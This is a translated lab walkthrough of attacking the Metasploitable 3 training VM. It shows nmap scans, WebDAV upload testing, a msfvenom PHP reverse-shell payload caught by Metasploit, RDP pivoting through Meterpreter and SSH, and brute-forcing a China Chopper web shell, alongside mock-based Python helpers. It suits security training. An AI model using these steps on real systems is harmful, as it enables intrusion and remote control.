
Metasploitable 3 Hands-On Penetration Testing

This article was worked through following the tutorial 年終福利大放送!!Metasploitable 3最新實戰滲透教程(附PPT) (Year-end bonus: the latest hands-on Metasploitable 3 penetration tutorial, with slides); thanks to demon of 即刻安全 for sharing it.

I. Introduction to Metasploitable 3

Everyone knows Metasploitable 2: an Ubuntu-based environment for testing security tools and practising penetration testing. Its shortcomings are just as obvious, and since Rapid7 has not updated or maintained it for a long time, it has become less and less representative of the targets a tester meets today. Metasploitable 3 fills exactly those gaps.

  • Metasploitable 2 is mostly used together with Metasploit modules, and rarely takes much time

For example, pick up ms08_067, find the overflow, done. Is that really what a hacking attack looks like?

  • So what to do? Make Metasploitable 3 harder to break into!

Right: the two developers put a firewall on their own target system. They explain that Metasploitable 3 ships with some security mechanisms built in, such as a firewall and permission settings. In addition, some of the vulnerabilities in Metasploitable 3 have no exploit module in Metasploit, so testers have to work those out themselves. And that is not all: to make Metasploitable 3 more fun, the developers added flags, so everyone can happily play CTF inside it.

  • One Metasploitable is hardly enough, though: real attacks usually involve many servers and computers.

For example, after compromising a router the attacker moves step by step into the connected PCs, switches, servers and so on. Metasploitable 3 is therefore extensible: you can install it on several machines and link them into a network of nodes.

II. Following the PTES (Penetration Testing Execution Standard)

1. Pre-engagement interactions

This is usually where you discuss with the client organisation to define the scope and goals of the test.

2. Intelligence gathering

Footprinting the target through a series of techniques, including social media, Google hacking and direct footprinting of the target systems, to learn how it behaves and how it operates.

3. Threat modelling

Threat modelling uses the information from the intelligence-gathering phase to identify the vulnerabilities and weaknesses that may exist on the target systems.

4. Vulnerability analysis

Vulnerability analysis takes the information gathered in the previous phases and works out which attack paths are actually feasible.

5. Exploitation

Exploitation runs exploits that have been researched and tested in depth against the target, rather than a large number of aimless attempts.

6. Post-exploitation

Post-exploitation begins once you have compromised some of the client's systems or obtained domain administrator privileges. It targets specific business systems, identifies critical infrastructure, looks for the information and assets the organisation values most and tries hardest to protect, and demonstrates the attack paths that would have the greatest business impact.

III. A First Penetration Test

0. Initial environment

Target (192.168.56.101):

Kali (192.168.56.210):

1. Scanning the target (information gathering)

Scan the target with nmap:

root@kali:~# nmap -p- -sS -sV -n -v --reason --open -oX demon.xml 192.168.56.101

What the options mean:

-sS TCP SYN scan. The basic "half-open" scan: Nmap sends a SYN and, on a SYN/ACK, tears the connection down with a RST instead of completing the handshake. Because no TCP session is established, the application on the target usually does not log the probe; a firewall or IDS watching the packets still sees it, so it is quieter, not invisible.
-sV Version detection: identify the software and version running on each open port
--open Show only open ports
--reason Show why each port is reported in its state (e.g. syn-ack, no-response)
-n No DNS resolution (local lab, nothing to resolve)
-oX XML output (we import it into Metasploit so it can be looked up again later)

Create a workspace in msfconsole and import the scan results:

msf > workspace -a win08-r2
[*] Added workspace: win08-r2
msf > workspace win08-r2
[*] Workspace: win08-r2
msf > db_import demon.xml
[*] Importing Nmap XML data
[*] Import: Parsing with Nokogiri v1.8.4
[*] Importing host 192.168.56.101
[*] Successfully imported /root/demon.xml
msf > services
Services
========

host port proto name state info
---- ---- ----- ---- ----- ----
192.168.56.101 21 tcp ftp open Microsoft ftpd
192.168.56.101 22 tcp ssh open OpenSSH 7.1 protocol 2.0
192.168.56.101 80 tcp http open Microsoft HTTPAPI httpd 2.0 SSDP/UPnP
192.168.56.101 1617 tcp rmiregistry open Java RMI
192.168.56.101 4848 tcp ssl/http open Oracle GlassFish 4.0 Servlet 3.1; JSP 2.3; Java 1.8
192.168.56.101 5985 tcp http open Microsoft HTTPAPI httpd 2.0 SSDP/UPnP
192.168.56.101 8022 tcp http open Apache Tomcat/Coyote JSP engine 1.1
192.168.56.101 8080 tcp http open Oracle GlassFish 4.0 Servlet 3.1; JSP 2.3; Java 1.8
192.168.56.101 8282 tcp http open Apache Tomcat/Coyote JSP engine 1.1
192.168.56.101 8484 tcp http open Jetty winstone-2.8
192.168.56.101 8585 tcp http open Apache httpd 2.2.21 (Win64) PHP/5.3.10 DAV/2
192.168.56.101 9200 tcp http open Elasticsearch REST API 1.1.1 name: Damon Dran; Lucene 4.7
192.168.56.101 49153 tcp msrpc open Microsoft Windows RPC
192.168.56.101 49154 tcp msrpc open Microsoft Windows RPC
192.168.56.101 49155 tcp msrpc open Microsoft Windows RPC
192.168.56.101 49181 tcp rmiregistry open Java RMI
192.168.56.101 49182 tcp tcpwrapped open

Or run the scan from msfconsole directly (db_nmap writes straight into the workspace; -sC also runs the default NSE scripts):

msf > db_nmap -sS -sV -sC -p- -n -v 192.168.56.101
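As an added example (not code from the original tutorial), the script below does offline what `db_import` plus `services` do in msfconsole: it parses an nmap `-oX` report into host/port/proto/name/state/info rows and then flags the rows this walkthrough goes on to test by hand. The XML is a constructed, cut-down sample for the target above, not the real demon.xml, and the triage rules are assumptions drawn only from what this page later looks at (WebDAV, HTTP.sys, a firewalled 3389, an unidentified tcpwrapped port).

```python
"""Parse an nmap -oX report into the rows msfconsole's `services` shows, then triage them."""
import xml.etree.ElementTree as ET
from dataclasses import dataclass

# Constructed sample report (not the real demon.xml): a few of the ports seen above plus one
# filtered port, so that the triage rules have something of every kind to look at.
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -p- -sS -sV -n -v --reason -oX demon.xml 192.168.56.101">
<host><status state="up" reason="arp-response"/>
<address addr="192.168.56.101" addrtype="ipv4"/>
<ports>
<port protocol="tcp" portid="21"><state state="open" reason="syn-ack"/><service name="ftp" product="Microsoft ftpd"/></port>
<port protocol="tcp" portid="80"><state state="open" reason="syn-ack"/><service name="http" product="Microsoft HTTPAPI httpd" version="2.0" extrainfo="SSDP/UPnP"/></port>
<port protocol="tcp" portid="3389"><state state="filtered" reason="no-response"/><service name="ms-wbt-server"/></port>
<port protocol="tcp" portid="8585"><state state="open" reason="syn-ack"/><service name="http" product="Apache httpd" version="2.2.21" extrainfo="(Win64) PHP/5.3.10 DAV/2"/></port>
<port protocol="tcp" portid="49182"><state state="open" reason="syn-ack"/><service name="tcpwrapped"/></port>
</ports></host></nmaprun>
"""


@dataclass(frozen=True)
class Service:
    host: str
    port: int
    proto: str
    name: str
    state: str
    info: str


def parse_nmap_xml(xml_text: str) -> list:
    """Flatten <host>/<port> elements into Service rows (all states; the caller filters)."""
    rows = []
    for host in ET.fromstring(xml_text).iter("host"):
        addr_el = host.find("address[@addrtype='ipv4']")
        if addr_el is None:
            continue
        for port in host.iter("port"):
            state = port.find("state").get("state")
            svc = port.find("service")
            name, info = "", ""
            if svc is not None:
                name = svc.get("name", "")
                # Same "info" column as msfconsole: product, version and extra info joined.
                info = " ".join(v for v in (svc.get("product"), svc.get("version"), svc.get("extrainfo")) if v)
            rows.append(Service(addr_el.get("addr"), int(port.get("portid")), port.get("protocol"), name, state, info))
    return rows


# Triage rules (assumed here) limited to what this walkthrough actually follows up on.
BANNER_RULES = [
    ("DAV/2", "WebDAV enabled: check PUT/MKCOL/MOVE and whether uploads execute (davtest)"),
    ("Microsoft HTTPAPI httpd 2.0", "HTTP.sys: run a non-destructive MS15-034 check before any DoS module"),
    ("tcpwrapped", "banner withheld: version detection could not classify it, probe manually"),
]


def triage(rows: list) -> list:
    """Return (port, note) pairs for rows that deserve manual follow-up."""
    notes = []
    for r in rows:
        if r.state == "filtered":
            notes.append((r.port, "filtered: host firewall; retest through a foothold (portfwd / ssh -L)"))
            continue
        if r.state != "open":
            continue
        banner = f"{r.name} {r.info}"
        for needle, note in BANNER_RULES:
            if needle in banner:
                notes.append((r.port, note))
    return notes


def render(rows: list) -> str:
    """Same columns as msfconsole's `services` table."""
    lines = ["host port proto name state info"]
    for r in rows:
        lines.append(f"{r.host} {r.port} {r.proto} {r.name} {r.state} {r.info}".rstrip())
    return "\n".join(lines)


if __name__ == "__main__":
    rows = parse_nmap_xml(SAMPLE_NMAP_XML)
    print(render(rows))
    for port, note in triage(rows):
        print(f"[!] {port}/tcp: {note}")
```

Run it against your own report with `parse_nmap_xml(open("demon.xml").read())`; the filtered-port rule is the one that matters most on this box, since the host firewall is what the later SSH and portfwd steps work around.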

2. Threat modelling and vulnerability analysis (verifying ports and services)

3. Vulnerability analysis, exploitation and post-exploitation

(1) WebDAV

WebDAV is an extension of HTTP that lets users manipulate files on the server as if they were local, which makes it a convenient way to store files over the network. For the users' convenience the share is often granted broad rights: upload, modify, and in the worst case the uploaded files are also executed by the web server. Kali Linux ships DAVTest, a tool for testing WebDAV shares: it automatically checks what it is allowed to do and looks for file types that the server executes. Once one is found, the tester can upload a built-in backdoor and take control of the server; the tool can also upload a file of your choosing for later use.

About DAVTest:

DAVTest uploads test files for executable types and then (optionally) uploads files that allow command execution or other actions directly on the target, in order to test enabled WebDAV servers. It is meant to let penetration testers quickly and easily determine whether an enabled DAV service is exploitable.

DAVTest supports:

  • Automatically sending test files for each executable type
  • Automatically randomising the directory name to help hide the files
  • Sending text files and trying to MOVE them to executable file names
  • Automatic cleanup of the uploaded files
  • Sending arbitrary files
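The probe below is an added example of the same idea DAVTest implements (it is not DAVTest's code): OPTIONS to see whether the collection advertises DAV, MKCOL a scratch directory, PUT one marker file per extension, then GET each file back. The one refinement worth having is in the last step: DAVTest prints `EXEC ... SUCCEED` whenever the marker string comes back, which is also true for `.txt` and `.html` files that are merely served as-is (you can see that in the run that follows). Here "interpreted" means the marker came back *without* its wrapper, so only genuinely executed files count. The mock server is constructed for the example (a handler that stores PUTs and "runs" `.php` by returning what it echoes, standing in for mod_php on an upload directory); the `/uploads/` path mirrors the target above.

```python
"""A davtest-style WebDAV probe: MKCOL a scratch directory, PUT one marker file per
extension, then GET each back and tell 'stored and served as-is' from 'interpreted'."""
import http.client
import re
import secrets
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer


def marker_files(marker: str) -> dict:
    """Each file prints just the marker if the server executes it."""
    return {
        "php": f"<?php echo '{marker}'; ?>",
        "asp": f"<% Response.Write(\"{marker}\") %>",
        "txt": marker,
    }


def probe_webdav(host: str, port: int, base: str) -> dict:
    """Return {ext: (put_ok, interpreted)} for the WebDAV collection at base."""
    marker = "dav-" + secrets.token_hex(4)
    conn = http.client.HTTPConnection(host, port, timeout=5)
    conn.request("OPTIONS", base)
    opt = conn.getresponse()
    opt.read()
    if not opt.getheader("DAV"):          # no DAV header: not a WebDAV collection
        conn.close()
        return {}
    scratch = f"{base.rstrip('/')}/probe_{marker}"
    conn.request("MKCOL", scratch)
    conn.getresponse().read()
    results = {}
    for ext, body in marker_files(marker).items():
        url = f"{scratch}/probe.{ext}"
        conn.request("PUT", url, body.encode(), {"Content-Type": "application/octet-stream"})
        r = conn.getresponse()
        r.read()
        put_ok = r.status in (200, 201, 204)
        interpreted = False
        if put_ok:
            conn.request("GET", url)
            served = conn.getresponse().read().decode(errors="replace")
            # Marker present but wrapper gone => the server ran the file. Marker present
            # with the wrapper intact => it was just served (davtest still says SUCCEED).
            interpreted = marker in served and served.strip() != body.strip()
        results[ext] = (put_ok, interpreted)
    conn.close()
    return results


# --- Constructed mock target (not Apache/mod_dav): accepts MKCOL/PUT anywhere and, like
# mod_php on an upload directory, "runs" .php files by returning whatever they echo.
class MockDav(BaseHTTPRequestHandler):
    protocol_version = "HTTP/1.1"
    files = {}

    def log_message(self, *args):
        pass

    def _reply(self, code, body=b"", headers=None):
        self.send_response(code)
        for name, value in (headers or {}).items():
            self.send_header(name, value)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def do_OPTIONS(self):
        self._reply(200, headers={"DAV": "1,2", "Allow": "OPTIONS,GET,PUT,MKCOL,MOVE"})

    def do_MKCOL(self):
        self._reply(201)

    def do_PUT(self):
        length = int(self.headers.get("Content-Length", 0))
        self.files[self.path] = self.rfile.read(length)
        self._reply(201)

    def do_GET(self):
        body = self.files.get(self.path)
        if body is None:
            self._reply(404)
            return
        if self.path.endswith(".php"):   # emulate PHP execution of the marker file
            m = re.search(rb"<\?php echo '([^']*)'; \?>", body)
            body = m.group(1) if m else body
        self._reply(200, body)


def run_demo() -> dict:
    """Start the mock on a free loopback port, probe it, shut it down."""
    srv = HTTPServer(("127.0.0.1", 0), MockDav)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    try:
        return probe_webdav("127.0.0.1", srv.server_address[1], "/uploads/")
    finally:
        srv.shutdown()
        srv.server_close()


if __name__ == "__main__":
    for ext, (put_ok, interpreted) in run_demo().items():
        print(f"{ext:4} PUT={'ok' if put_ok else 'fail'} interpreted={interpreted}")
```

Against the real target you would call `probe_webdav("192.168.56.101", 8585, "/uploads/")`; the fix on the server side is the mirror image of what the probe looks for: either deny PUT/MKCOL on the share or disable script execution in the upload directory, and ideally both.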

root@kali:~# davtest -url http://192.168.56.101:8585/uploads/
********************************************************
Testing DAV connection
OPEN SUCCEED: http://192.168.56.101:8585/uploads
********************************************************
NOTE Random string for this session: UudtI1Re3
********************************************************
Creating directory
MKCOL SUCCEED: Created http://192.168.56.101:8585/uploads/DavTestDir_UudtI1Re3
********************************************************
Sending test files
PUT cgi SUCCEED: http://192.168.56.101:8585/uploads/DavTestDir_UudtI1Re3/davtest_UudtI1Re3.cgi
PUT cfm SUCCEED: http://192.168.56.101:8585/uploads/DavTestDir_UudtI1Re3/davtest_UudtI1Re3.cfm
PUT html SUCCEED: http://192.168.56.101:8585/uploads/DavTestDir_UudtI1Re3/davtest_UudtI1Re3.html
PUT php SUCCEED: http://192.168.56.101:8585/uploads/DavTestDir_UudtI1Re3/davtest_UudtI1Re3.php
PUT pl SUCCEED: http://192.168.56.101:8585/uploads/DavTestDir_UudtI1Re3/davtest_UudtI1Re3.pl
PUT asp SUCCEED: http://192.168.56.101:8585/uploads/DavTestDir_UudtI1Re3/davtest_UudtI1Re3.asp
PUT shtml SUCCEED: http://192.168.56.101:8585/uploads/DavTestDir_UudtI1Re3/davtest_UudtI1Re3.shtml
PUT aspx SUCCEED: http://192.168.56.101:8585/uploads/DavTestDir_UudtI1Re3/davtest_UudtI1Re3.aspx
PUT jhtml SUCCEED: http://192.168.56.101:8585/uploads/DavTestDir_UudtI1Re3/davtest_UudtI1Re3.jhtml
PUT txt SUCCEED: http://192.168.56.101:8585/uploads/DavTestDir_UudtI1Re3/davtest_UudtI1Re3.txt
PUT jsp SUCCEED: http://192.168.56.101:8585/uploads/DavTestDir_UudtI1Re3/davtest_UudtI1Re3.jsp
********************************************************
Checking for test file execution
EXEC cgi FAIL
EXEC cfm FAIL
EXEC html SUCCEED: http://192.168.56.101:8585/uploads/DavTestDir_UudtI1Re3/davtest_UudtI1Re3.html
EXEC php SUCCEED: http://192.168.56.101:8585/uploads/DavTestDir_UudtI1Re3/davtest_UudtI1Re3.php
EXEC pl FAIL
EXEC asp FAIL
EXEC shtml FAIL
EXEC aspx FAIL
EXEC jhtml FAIL
EXEC txt SUCCEED: http://192.168.56.101:8585/uploads/DavTestDir_UudtI1Re3/davtest_UudtI1Re3.txt
EXEC jsp FAIL

********************************************************
/usr/bin/davtest Summary:
Created: http://192.168.56.101:8585/uploads/DavTestDir_UudtI1Re3
PUT File: http://192.168.56.101:8585/uploads/DavTestDir_UudtI1Re3/davtest_UudtI1Re3.cgi
PUT File: http://192.168.56.101:8585/uploads/DavTestDir_UudtI1Re3/davtest_UudtI1Re3.cfm
PUT File: http://192.168.56.101:8585/uploads/DavTestDir_UudtI1Re3/davtest_UudtI1Re3.html
PUT File: http://192.168.56.101:8585/uploads/DavTestDir_UudtI1Re3/davtest_UudtI1Re3.php
PUT File: http://192.168.56.101:8585/uploads/DavTestDir_UudtI1Re3/davtest_UudtI1Re3.pl
PUT File: http://192.168.56.101:8585/uploads/DavTestDir_UudtI1Re3/davtest_UudtI1Re3.asp
PUT File: http://192.168.56.101:8585/uploads/DavTestDir_UudtI1Re3/davtest_UudtI1Re3.shtml
PUT File: http://192.168.56.101:8585/uploads/DavTestDir_UudtI1Re3/davtest_UudtI1Re3.aspx
PUT File: http://192.168.56.101:8585/uploads/DavTestDir_UudtI1Re3/davtest_UudtI1Re3.jhtml
PUT File: http://192.168.56.101:8585/uploads/DavTestDir_UudtI1Re3/davtest_UudtI1Re3.txt
PUT File: http://192.168.56.101:8585/uploads/DavTestDir_UudtI1Re3/davtest_UudtI1Re3.jsp
Executes: http://192.168.56.101:8585/uploads/DavTestDir_UudtI1Re3/davtest_UudtI1Re3.html
Executes: http://192.168.56.101:8585/uploads/DavTestDir_UudtI1Re3/davtest_UudtI1Re3.php
Executes: http://192.168.56.101:8585/uploads/DavTestDir_UudtI1Re3/davtest_UudtI1Re3.txt

root@kali:~#

Generate the payload and upload it (the target directory DavTestDir_12ja05EL was created by an earlier davtest run, as the directory listing further down confirms; use whatever directory your own run created):

root@kali:~# msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.56.210 LPORT=6666 -f raw >demon.php
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 30305 bytes

root@kali:~# davtest -url http://192.168.56.101:8585/uploads/ -uploadfile demon.php -uploadloc DavTestDir_12ja05EL/6666.php
********************************************************
Testing DAV connection
OPEN SUCCEED: http://192.168.56.101:8585/uploads
********************************************************
unless Uploading file
Upload succeeded: http://192.168.56.101:8585/uploads/DavTestDir_12ja05EL/6666.php

Check the upload:

Start the attack: set up a handler for the payload we uploaded:

msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload php/meterpreter_reverse_tcp
msf exploit(multi/handler) > set LHOST 192.168.56.210
LHOST => 192.168.56.210
msf exploit(multi/handler) > set LPORT 6666
LPORT => 6666
msf exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.56.210:6666

Request the uploaded file on the target from a browser:

We get a Meterpreter session; now on to post-exploitation:

msf exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.56.210:6666
[*] Meterpreter session 1 opened (192.168.56.210:6666 -> 192.168.56.101:49308) at 2018-12-24 04:40:54 -0500

meterpreter >
meterpreter > help

Core Commands
=============

Command Description
------- -----------
? Help menu
background Backgrounds the current session
bgkill Kills a background meterpreter script
bglist Lists running background scripts
bgrun Executes a meterpreter script as a background thread
channel Displays information or control active channels
close Closes a channel
disable_unicode_encoding Disables encoding of unicode strings
enable_unicode_encoding Enables encoding of unicode strings
exit Terminate the meterpreter session
get_timeouts Get the current session timeout values
guid Get the session GUID
help Help menu
info Displays information about a Post module
irb Drop into irb scripting mode
load Load one or more meterpreter extensions
machine_id Get the MSF ID of the machine attached to the session
migrate Migrate the server to another process
pivot Manage pivot listeners
quit Terminate the meterpreter session
read Reads data from a channel
resource Run the commands stored in a file
run Executes a meterpreter script or Post module
sessions Quickly switch to another session
set_timeouts Set the current session timeout values
sleep Force Meterpreter to go quiet, then re-establish session.
transport Change the current transport mechanism
use Deprecated alias for "load"
uuid Get the UUID for the current session
write Writes data to a channel

Stdapi: File system Commands
============================

Command Description
------- -----------
cat Read the contents of a file to the screen
cd Change directory
checksum Retrieve the checksum of a file
cp Copy source to destination
dir List files (alias for ls)
download Download a file or directory
edit Edit a file
getlwd Print local working directory
getwd Print working directory
lcd Change local working directory
lls List local files
lpwd Print local working directory
ls List files
mkdir Make directory
mv Move source to destination
pwd Print working directory
rm Delete the specified file
rmdir Remove directory
search Search for files
upload Upload a file or directory

Stdapi: Networking Commands
===========================

Command Description
------- -----------
portfwd Forward a local port to a remote service

Stdapi: System Commands
=======================

Command Description
------- -----------
execute Execute a command
getenv Get one or more environment variable values
getpid Get the current process identifier
getuid Get the user that the server is running as
kill Terminate a process
localtime Displays the target systems local date and time
pgrep Filter processes by name
pkill Terminate processes by name
ps List running processes
shell Drop into a system command shell
sysinfo Gets information about the remote system, such as OS

Stdapi: Audio Output Commands
=============================

Command Description
------- -----------
play play an audio file on target system, nothing written on disk
meterpreter > ls
Listing: C:\wamp\www\uploads\DavTestDir_12ja05EL
================================================

Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100666/rw-rw-rw- 30305 fil 2018-12-23 22:34:06 -0500 6666.php
100666/rw-rw-rw- 44 fil 2018-12-23 22:28:25 -0500 davtest_12ja05EL.asp
100666/rw-rw-rw- 44 fil 2018-12-23 22:28:26 -0500 davtest_12ja05EL.aspx
100666/rw-rw-rw- 42 fil 2018-12-23 22:28:26 -0500 davtest_12ja05EL.cfm
100666/rw-rw-rw- 66 fil 2018-12-23 22:28:26 -0500 davtest_12ja05EL.cgi
100666/rw-rw-rw- 26 fil 2018-12-23 22:28:25 -0500 davtest_12ja05EL.html
100666/rw-rw-rw- 37 fil 2018-12-23 22:28:25 -0500 davtest_12ja05EL.jhtml
100666/rw-rw-rw- 37 fil 2018-12-23 22:28:26 -0500 davtest_12ja05EL.jsp
100666/rw-rw-rw- 24 fil 2018-12-23 22:28:25 -0500 davtest_12ja05EL.php
100666/rw-rw-rw- 66 fil 2018-12-23 22:28:26 -0500 davtest_12ja05EL.pl
100666/rw-rw-rw- 177 fil 2018-12-23 22:28:25 -0500 davtest_12ja05EL.shtml
100666/rw-rw-rw- 19 fil 2018-12-23 22:28:25 -0500 davtest_12ja05EL.txt

meterpreter > sysinfo
Computer : METASPLOITABLE3
OS : Windows NT METASPLOITABLE3 6.1 build 7601 (Windows Server 2008 R2 Standard Edition Service Pack 1) AMD64
Meterpreter : php/windows
meterpreter > shell
Process 3580 created.
Channel 0 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\wamp\bin\apache\Apache2.2.21>

At this point the session throws an error; ignore it and reconnect:

meterpreter > ps

Process List
============

PID Name User Path
--- ---- ---- ----
0 System Idle Process NT AUTHORITY\SYSTEM System Idle Process
4 System N/A System
12 svchost.exe N/A svchost.exe
252 smss.exe N/A smss.exe
324 csrss.exe N/A csrss.exe
376 csrss.exe N/A csrss.exe
...

Try to set up a Remote Desktop connection (3389 is not reachable from outside, so it is relayed through the Meterpreter session instead):

meterpreter > portfwd add -l 8888 -p 3389 -r 192.168.56.101
[*] Local TCP relay created: :8888 <-> 192.168.56.101:3389

Try to connect from the Kali host:

(2) SSH (the account name is not shown on the page; <user> stands in for it below)

root@kali:~# ssh <user>@192.168.56.101
<user>@192.168.56.101's password:
Last login: Sun Dec 23 19:53:07 2018 from 192.168.56.210
-sh-4.3$

Set up port forwarding (local port 3389 is forwarded, through the SSH session, to port 3389 on the target's own loopback interface):

root@kali:~# ssh -L 3389:localhost:3389 <user>@192.168.56.101
<user>@192.168.56.101's password:
Last login: Mon Dec 24 01:54:26 2018 from 192.168.56.210
-sh-4.3$

Compare a direct scan with one through the tunnel: from outside, the host firewall filters 3389, but via the forward the same service shows up open on Kali's 127.0.0.1:

root@kali:~# nmap -p 3389 192.168.56.101
Starting Nmap 7.70 ( https://nmap.org ) at 2018-12-24 04:56 EST
Nmap scan report for 192.168.56.101
Host is up (0.00028s latency).

PORT STATE SERVICE
3389/tcp filtered ms-wbt-server
MAC Address: 08:00:27:85:F5:18 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 13.38 seconds
root@kali:~# nmap -p 3389 127.0.0.1
Starting Nmap 7.70 ( https://nmap.org ) at 2018-12-24 04:57 EST
Nmap scan report for localhost (127.0.0.1)
Host is up (0.000047s latency).

PORT STATE SERVICE
3389/tcp open ms-wbt-server

Nmap done: 1 IP address (1 host up) scanned in 0.04 seconds

Try connecting from Kali (to 127.0.0.1:3389, the tunnelled port):
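Both `portfwd add -l 8888 -p 3389 -r 192.168.56.101` and `ssh -L 3389:localhost:3389` do the same thing: listen on a local port and pump bytes between each client and a connection opened from the foothold to the real service. The relay below is an added example of that mechanism (my code, not Meterpreter's or OpenSSH's), written so the half-close semantics are right, which is what a naive `shutdown(SHUT_RDWR)`-on-EOF relay gets wrong. The "loopback-only service" standing in for RDP is a constructed TCP echo server; nothing here touches 192.168.56.101.

```python
"""A minimal TCP port-forward relay: the mechanism behind meterpreter's `portfwd add`
and `ssh -L`. Listen locally; for each client, connect to the target and bridge them."""
import socket
import threading


def _pump(src: socket.socket, dst: socket.socket) -> None:
    """Copy bytes src -> dst until EOF, then half-close dst so the peer sees the same EOF.
    Only the write side is shut: the other pump may still be carrying the reply back."""
    try:
        while True:
            data = src.recv(4096)
            if not data:
                break
            dst.sendall(data)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def _bridge(a: socket.socket, b: socket.socket) -> None:
    """Pump both directions; close both sockets only once both directions have drained."""
    threads = [threading.Thread(target=_pump, args=(a, b)),
               threading.Thread(target=_pump, args=(b, a))]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    a.close()
    b.close()


class Relay:
    """Listen on bind_addr; for every client, open target_addr and bridge the two."""

    def __init__(self, bind_addr: tuple, target_addr: tuple):
        self.target_addr = target_addr
        self.listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.listener.bind(bind_addr)
        self.listener.listen(16)
        self.local_port = self.listener.getsockname()[1]
        threading.Thread(target=self._accept_loop, daemon=True).start()

    def _accept_loop(self) -> None:
        while True:
            try:
                client, _ = self.listener.accept()
            except OSError:              # listener closed by close()
                return
            try:
                upstream = socket.create_connection(self.target_addr, timeout=5)
                upstream.settimeout(None)
            except OSError:              # target refused: drop this client, keep serving
                client.close()
                continue
            threading.Thread(target=_bridge, args=(client, upstream), daemon=True).start()

    def close(self) -> None:
        self.listener.close()


# --- Constructed stand-in for the service that is only reachable from the target's own
# loopback (RDP on 3389 in the walkthrough): a plain TCP echo server.
def start_echo_server() -> socket.socket:
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)

    def echo(conn):
        _pump(conn, conn)
        conn.close()

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:
                return
            threading.Thread(target=echo, args=(conn,), daemon=True).start()

    threading.Thread(target=serve, daemon=True).start()
    return srv


def through_relay(payload: bytes) -> bytes:
    """Send payload to the loopback-only service via the relay and return what comes back."""
    echo = start_echo_server()
    relay = Relay(("127.0.0.1", 0), echo.getsockname())
    try:
        with socket.create_connection(("127.0.0.1", relay.local_port), timeout=5) as c:
            c.sendall(payload)
            c.shutdown(socket.SHUT_WR)   # our EOF travels down the chain; the reply's EOF comes back
            chunks = []
            while True:
                data = c.recv(4096)
                if not data:
                    break
                chunks.append(data)
        return b"".join(chunks)
    finally:
        relay.close()
        echo.close()


if __name__ == "__main__":
    print(through_relay(b"hello through the pivot"))
```

The defensive reading is the same as the nmap comparison above: a host firewall that filters 3389 on the external interface says nothing about who can reach it once any code runs on the box, so a service meant for administrators only should also be bound or ACL'd on the loopback side, not just filtered at the edge.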

(3) Connecting with China Chopper (Caidao)

msf > search caidao

Matching Modules
================

Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/scanner/http/caidao_bruteforce_login normal Chinese Caidao Backdoor Bruteforce
exploit/multi/http/caidao_php_backdoor_exec 2015-10-27 excellent China Chopper Caidao PHP Backdoor Code Execution
msf > use auxiliary/scanner/http/caidao_bruteforce_login
msf auxiliary(scanner/http/caidao_bruteforce_login) > set RHOSTS 192.168.56.101
RHOSTS => 192.168.56.101
msf auxiliary(scanner/http/caidao_bruteforce_login) > set TARGETURI /caidao.asp
TARGETURI => /caidao.asp
msf auxiliary(scanner/http/caidao_bruteforce_login) > run

[-] 192.168.56.101:80 - Failed: admin
[-] 192.168.56.101:80 - Failed: 123456
[-] 192.168.56.101:80 - Failed: 12345
[-] 192.168.56.101:80 - Failed: 123456789
[+] 192.168.56.101:80 - Success: password
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Connection password found: 'password'.

Try connecting with the Caidao client:
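What `caidao_bruteforce_login` found is not a login credential in the usual sense. A China Chopper one-liner looks like `<?php @eval($_POST['password']); ?>`: the "password" is the name of the POST field whose value gets evaluated, and a guess is correct when the code you sent in that field visibly ran. The script below is an added example of that loop (my code, not the Metasploit module's), with a constructed stand-in for the PHP one-liner so it runs offline; the wordlist order copies the module output above. The page's target was an `.asp` one-liner, whose probe is VBScript rather than PHP, so the emulation here is of the PHP form only.

```python
"""How a Chopper 'password' brute-force works: the secret is the POST field name,
the probe is code, and a hit is 'my code ran' rather than 'login accepted'."""
import re
import secrets
from urllib.parse import parse_qs, urlencode

# Same order as the module output above (constructed list).
WORDLIST = ["admin", "123456", "12345", "123456789", "password"]


def build_probe(param: str, marker: str) -> tuple:
    """One guess: a form body whose *field name* is the candidate and whose value is PHP."""
    headers = {"Content-Type": "application/x-www-form-urlencoded"}
    return headers, urlencode({param: f"echo '{marker}';"})


def chopper_bruteforce(send, candidates, marker=None):
    """send(headers, body) -> (status, text). Returns the field name that got our code executed."""
    marker = marker or "caidao-" + secrets.token_hex(4)
    for candidate in candidates:
        headers, body = build_probe(candidate, marker)
        status, text = send(headers, body)
        if status == 200 and marker in text:
            return candidate
    return None


def emulate_chopper_backdoor(secret: str):
    """Constructed stand-in for `<?php @eval($_POST['<secret>']); ?>`; only `echo '...';` is honoured.
    The '@' silences errors, so a wrong field name yields an empty 200: no lockout, no log noise,
    which is exactly why blind guessing of the field name works."""
    def send(headers, body):
        form = parse_qs(body)
        code = form.get(secret, [None])[0]
        if code is None:
            return 200, ""
        m = re.fullmatch(r"echo '([^']*)';", code)
        return 200, (m.group(1) if m else "")
    return send


if __name__ == "__main__":
    hit = chopper_bruteforce(emulate_chopper_backdoor("password"), WORDLIST)
    print("connection password:", hit)
```

To run it against a real host, `send` would wrap an HTTP POST to the target URI and return the status and body; the detection angle is the flip side of the same fact: a script that answers every POST with 200 and an empty body, regardless of the field name, is worth pulling off disk and reading.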

